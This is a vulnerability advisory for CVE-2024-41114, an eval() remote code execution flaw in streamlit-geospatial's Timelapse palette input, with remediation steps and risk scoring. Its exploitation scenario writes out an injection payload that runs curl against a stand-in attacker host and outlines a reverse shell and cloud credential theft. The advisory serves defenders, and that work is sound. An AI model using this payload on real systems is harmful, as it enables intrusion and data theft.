CVE-2024-41114: streamlit-geospatial: RCE via eval() on palette input
CRITICAL PoC AVAILABLE CISA: ATTENDAny exposed instance of streamlit-geospatial is fully compromised with a single HTTP request — no credentials, no complexity. ML/data science teams routinely share Streamlit apps internally without network controls, and this app often runs with cloud credentials in scope. Patch to commit c4f81d9 immediately and audit all Streamlit deployments for eval()/exec() on user input.
Risk Assessment
Critical. CVSS 9.8 with zero prerequisites — unauthenticated, no user interaction, low complexity, network-accessible. Real-world exposure is high because data science teams habitually deploy Streamlit apps without authentication layers. ML infrastructure is high-value post-exploitation: it typically holds cloud credentials in environment variables, has access to data lakes and model registries, and is poorly monitored compared to production systems. This is as exploitable as it gets.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| streamlit-geospatial | pip | — | No patch |
Do you use streamlit-geospatial? You're affected.
Severity & Risk
Attack Surface
Recommended Action
5 steps-
PATCH
Update to commit c4f81d9616d40c60584e36abb15300853a66e489 or later — the fix replaces eval() with a safe allowlist approach.
-
ISOLATE
Immediately restrict network access to any unpatched instance; Streamlit apps must never be internet-exposed without a WAF and authentication.
-
AUDIT
Run grep -r 'eval(' across all internal ML/data science apps — this antipattern is widespread in notebooks-turned-apps.
-
DETECT
Review web server logs for unusual palette parameter values; monitor for unexpected child processes spawned by Python processes and anomalous outbound connections.
-
ROTATE
If the instance was exposed, rotate all credentials accessible from that environment (cloud keys, API tokens, SSH keys).
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2024-41114?
Any exposed instance of streamlit-geospatial is fully compromised with a single HTTP request — no credentials, no complexity. ML/data science teams routinely share Streamlit apps internally without network controls, and this app often runs with cloud credentials in scope. Patch to commit c4f81d9 immediately and audit all Streamlit deployments for eval()/exec() on user input.
Is CVE-2024-41114 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2024-41114, increasing the risk of exploitation.
How to fix CVE-2024-41114?
1. PATCH: Update to commit c4f81d9616d40c60584e36abb15300853a66e489 or later — the fix replaces eval() with a safe allowlist approach. 2. ISOLATE: Immediately restrict network access to any unpatched instance; Streamlit apps must never be internet-exposed without a WAF and authentication. 3. AUDIT: Run grep -r 'eval(' across all internal ML/data science apps — this antipattern is widespread in notebooks-turned-apps. 4. DETECT: Review web server logs for unusual palette parameter values; monitor for unexpected child processes spawned by Python processes and anomalous outbound connections. 5. ROTATE: If the instance was exposed, rotate all credentials accessible from that environment (cloud keys, API tokens, SSH keys).
What systems are affected by CVE-2024-41114?
This vulnerability affects the following AI/ML architecture patterns: ML UI / data science web apps, Geospatial ML pipelines, Streamlit-based model demos and internal tools, Shared data science infrastructure, Cloud-connected ML compute environments.
What is the CVSS score for CVE-2024-41114?
CVE-2024-41114 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 1.31%.
Technical Details
NVD Description
streamlit-geospatial is a streamlit multipage app for geospatial applications. Prior to commit c4f81d9616d40c60584e36abb15300853a66e489, the `palette` variable on line 430 in `pages/1_📷_Timelapse.py` takes user input, which is later used in the `eval()` function on line 435, leading to remote code execution. Commit c4f81d9616d40c60584e36abb15300853a66e489 fixes this issue.
Exploitation Scenario
An adversary discovers a publicly exposed streamlit-geospatial instance via Shodan or a simple Google dork for 'Streamlit' plus geospatial terms. They navigate to the Timelapse page and submit a palette value of `__import__('os').popen('curl http://attacker.com/beacon').read()`. The eval() on line 435 executes this immediately. They escalate by injecting a reverse shell payload, gaining interactive access to the ML server. Within minutes they enumerate environment variables, find AWS credentials with S3 and SageMaker permissions, exfiltrate training datasets, and deploy a persistent backdoor in a shared model artifact. Total exploit time: under 5 minutes. Zero AI/ML expertise required.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References
- github.com/opengeos/streamlit-geospatial/blob/4b89495f3bdd481998aadf1fc74b10de0f71c237/pages/1_%F0%9F%93%B7_Timelapse.py Product
- github.com/opengeos/streamlit-geospatial/blob/4b89495f3bdd481998aadf1fc74b10de0f71c237/pages/1_%F0%9F%93%B7_Timelapse.py Product
- github.com/opengeos/streamlit-geospatial/commit/c4f81d9616d40c60584e36abb15300853a66e489 Patch
- securitylab.github.com/advisories/GHSL-2024-100_GHSL-2024-108_streamlit-geospatial/ Exploit 3rd Party
- github.com/fkie-cad/nvd-json-data-feeds Exploit
Timeline
Related Vulnerabilities
CVE-2024-41116 9.8 streamlit-geospatial: RCE via eval() injection
Same package: streamlit CVE-2024-41113 9.8 streamlit-geospatial: RCE via eval() in Timelapse page
Same package: streamlit CVE-2024-41115 9.8 streamlit-geospatial: eval() injection enables RCE
Same package: streamlit CVE-2024-41112 9.8 streamlit-geospatial: RCE via eval() on palette input
Same package: streamlit CVE-2024-41117 9.8 streamlit-geospatial: eval() injection allows RCE
Same package: streamlit
AI Threat Alert